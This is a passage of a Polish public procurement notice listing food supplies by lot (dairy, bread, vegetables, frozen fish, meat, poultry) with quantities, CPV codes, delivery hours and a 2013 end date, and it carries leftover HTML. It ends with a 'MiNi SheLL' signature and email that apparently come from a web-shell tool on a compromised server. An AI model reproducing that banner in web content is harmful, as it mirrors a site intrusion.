Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	10
2	Mleko 2% 1L	L	950
3	Śmietana 24% 400g	l	1548
4	Ser żółty pełnotłusty Gołda 900g-1kg  lub równoważny	kg	31,5
5	Serek topiony o zawartości tłuszczu nie mniej niż 25% 125g	kg	120
6	Serek wiejski 200g	kg	20
7	Twaróg biały tłusty 1 kg	kg	305
8	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	40
9	Serek Bakoma lub równoważny	szt.	2304
10	Serek Danone lub równoważny	szt.	3724
11	Kefir 400 g	szt.	156
12	Margaryna 250 g	szt.	125
13	Serek homogenizowany	szt.	2025

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
-  codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Bułka zwykła 100g	szt. 	595
2	Bułka tarta 1kg	kg	86
3	Chleb krojony pszenno-żytni jasny 600g-900g	kg	3357

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
- codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA i OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 
1	2	3	4
1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6330
2	Kapusta biała świeża	kg	219
3	Marchew korzeń	kg	885
4	Cebula biała korzeń	kg	128
5	Pieczarki gat I	kg	164,5
6	Rzodkiewka	pęczek	50
7	Ogórek  zielony świeży	kg	110
8.	Buraki czerwone świeże	kg	590
9.	Kapusta kwaszona	kg	632
10.	Jabłka gat I	kg	982
11.	Kapusta pekińska świeża	kg	40
12.	Por	kg	23,5
13.	Seler korzeń	kg	285
14.	Pomidory świeże	kg	65
15.	Sałata zielona	szt.	415
16.	Kapusta czerwona świeża	kg	197
17.	Por 	szt.	144
18.	Koper zielony świeży	pęczek	85
19.	Pietruszka korzeń	kg	348
20.	Kalafior 	szt	62
21.	Banany 	kg	346
22.	Papryka świeża czerwona	kg	30
23.	Kapusta młoda świeża	szt	55
24.	Ogórek kiszony	kg	590
25. 	Mandarynki 	kg	200
26. 	Pomarańcza 	kg	292
27.	Kukurydza konserwowa 400 g	szt. 	30

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
- codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI i RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Fasolka szparagowa 500g	kg	27
2	Kalafior 500g	kg	117
3	Mieszanka jarzynowa 8-składnikowa 500g	kg	153
4	Marchew mrożona mini 1kg	kg	110
5	Mieszanka kompotowa o,5 kg	kg	192
6	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	265
7	Brokuły 450 g	szt.	67
8	Brukselka 450 g	szt.	
9	Truskawka mrożona o,5 kg	szt.	150
10	Wiśnie mrożone 0,5 kg	szt. 	79

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
- 2 razy w tygodniu od godz. 6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE i DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Boczek wędzony nieparzony	kg	30
2	Kiełbasa wiejska* cienka o zawartości mięsa nie mniej niż 60%	kg	270
3	Karczek b/k wieprzowy	kg	695
4	Żeberka 	kg	257
5	Mortadela	kg	152
6	Mięso mielone	kg	724
7	Antrykot	kg	8,5
8.	Smalec	kg	160
9.	Słonina surowa bez skóry	kg	10,5
10.	Boczek surowy	kg	32

11.	Kiełbasa  żywiecka* o zawartości mięsa nie mniej niż 80%	kg	5

12.	Schab z/k wieprzowy	kg	658
13.	Golonka	kg	17,6
14.	Wołowina b/k	kg	31

*produkty z wykluczeniem mięsa mechanicznie odkostnionego.

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
-  codziennie od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MIĘSO DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Filet z kurczaka surowy	kg	182
2	Kurczak	kg	126
3	Porcja rosołowa  kurczaka ze skrzydłem	kg	19
4	Udziec z kurczaka	kg	540
5	Porcja rosołowa b/skrz.	kg	138
6	Wątróbka drobiowa	kg	145

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
-  1 raz w tygodniu od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com